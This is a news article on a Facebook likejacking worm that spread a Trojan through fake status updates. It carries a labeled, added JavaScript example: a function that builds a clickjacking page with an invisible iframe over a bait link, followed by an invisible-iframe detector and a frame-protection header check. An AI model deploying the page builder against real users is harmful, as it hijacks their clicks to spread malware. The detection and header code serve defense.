Facebook users get, 'like', infected

Clickjacking serves Trojan

Thousands of PCs have reportedly been infected with a Trojan delivered through a Facebook exploit, according to a security firm.

The clickjacking attack exploits Facebook’s ‘like’ function and spreads using fake status updates.

Sophos chief technical officer Graham Cluley wrote on his blog that the worm had spread quickly across the social networking site last weekend.

“Visiting users are tricked into ‘liking’ a page without necessarily realising they are recommending it to all of their Facebook friends,” Cluley wrote.

“If you believe you may have been hit by this attack, view the recent activity on your news feed and delete entries related to the above links. Furthermore, you should view your profile, click on your Info tab and remove any of the pages from your ‘likes and interests’ section.”

Users who follow the status-update link land on a page that appears blank apart from a further link. That link sits over a hidden, malicious iframe, so clicking it delivers the Trojan (detected by Sophos as Troj/Iframe-ET) and at the same time registers the ‘like’ that republishes the bait to the victim’s friends.
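The mechanism the article describes, written out as an added example that is not code from the article or from Sophos: an attacker page with a transparent iframe stacked over a visible bait link, a scanner that flags such invisible iframes in fetched markup, and a check of whether a site's own response headers stop third-party framing. TARGET_URL, the function names and the bait text are assumptions chosen for illustration; the real attack framed Facebook's Like plugin.

```javascript
// Added example: likejacking page construction plus two practitioner checks.
// TARGET_URL is a hypothetical plugin URL standing in for the real Like button.
const TARGET_URL = "https://example.invalid/plugins/like.php?href=ATTACKER_PAGE";

// Attacker-side page: a visible bait link with a transparent iframe holding
// the target's Like button positioned over it and stacked above it, so the
// victim's click lands on the hidden button instead of the link.
function buildLikejackingPage(baitText, targetUrl) {
  return [
    "<html><body>",
    '<a id="bait" href="#" style="position:absolute;top:100px;left:100px;">' +
      baitText + "</a>",
    '<iframe src="' + targetUrl + '" scrolling="no" ' +
      'style="position:absolute;top:95px;left:90px;width:90px;height:25px;' +
      'opacity:0;filter:alpha(opacity=0);z-index:10;border:0;"></iframe>',
    "</body></html>",
  ].join("\n");
}

// Page-side heuristic: an <iframe> whose inline style makes it invisible
// (opacity 0, the IE alpha filter, or visibility:hidden) is a clickjacking
// indicator. Returns the src of every such iframe found in the markup.
function findInvisibleIframes(html) {
  const iframeRe = /<iframe\b([^>]*)>/gi;
  const hits = [];
  let m;
  while ((m = iframeRe.exec(html)) !== null) {
    const attrs = m[1];
    const styleMatch = /style\s*=\s*"([^"]*)"/i.exec(attrs);
    // Strip whitespace so "opacity: 0" and "opacity:0" compare equal.
    const style = styleMatch ? styleMatch[1].replace(/\s+/g, "").toLowerCase() : "";
    const srcMatch = /src\s*=\s*"([^"]*)"/i.exec(attrs);
    const invisible =
      /(?:^|;)opacity:0(?:;|$)/.test(style) ||   // exactly 0, not 0.9 etc.
      /alpha\(opacity=0\)/.test(style) ||
      /visibility:hidden/.test(style);
    if (invisible) hits.push(srcMatch ? srcMatch[1] : "(no src)");
  }
  return hits;
}

// Server-side check for your own pages: do the response headers stop a
// third party from framing them? X-Frame-Options DENY/SAMEORIGIN/ALLOW-FROM
// and any CSP frame-ancestors list other than "*" block an attacker's site.
function framingProtection(headers) {
  const get = (name) => {
    for (const k of Object.keys(headers)) {
      if (k.toLowerCase() === name) return String(headers[k]);
    }
    return "";
  };
  const xfo = get("x-frame-options").trim().toUpperCase();
  if (xfo === "DENY" || xfo === "SAMEORIGIN" || xfo.startsWith("ALLOW-FROM")) {
    return "denied";
  }
  const fa = /frame-ancestors\s+([^;]+)/i.exec(get("content-security-policy"));
  if (fa) {
    const sources = fa[1].trim().split(/\s+/).map((s) => s.replace(/'/g, ""));
    if (!sources.includes("*")) return "denied";
  }
  return "frameable";
}

// Usage: scan the constructed attack page, then check a hardened response.
console.log(findInvisibleIframes(buildLikejackingPage("Click here to continue", TARGET_URL)));
console.log(framingProtection({ "X-Frame-Options": "SAMEORIGIN" }));
```

The header check applies to pages you control. A widget such as the Like button is designed to be embedded on other sites, so its provider cannot ship DENY or SAMEORIGIN without breaking it, which is why likejacking is awkward to stop at the framing layer; the iframe heuristic is the check to run on a suspicious bait page instead.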

Cluley wrote that the bogus status updates include:

“LOL This girl gets OWNED after a POLICE OFFICER reads her STATUS MESSAGE.”
“This man takes a picture of himself EVERYDAY for 8 YEARS!!”
“The Prom Dress That Got This Girl Suspended From School.”
“This Girl Has An Interesting Way Of Eating A Banana, Check It Out!”

The attack is similar to the Fbhole worm that stung Facebook users in May.

Security researcher Narkolayev Shlomi detailed how the clickjacking attack works earlier this year.
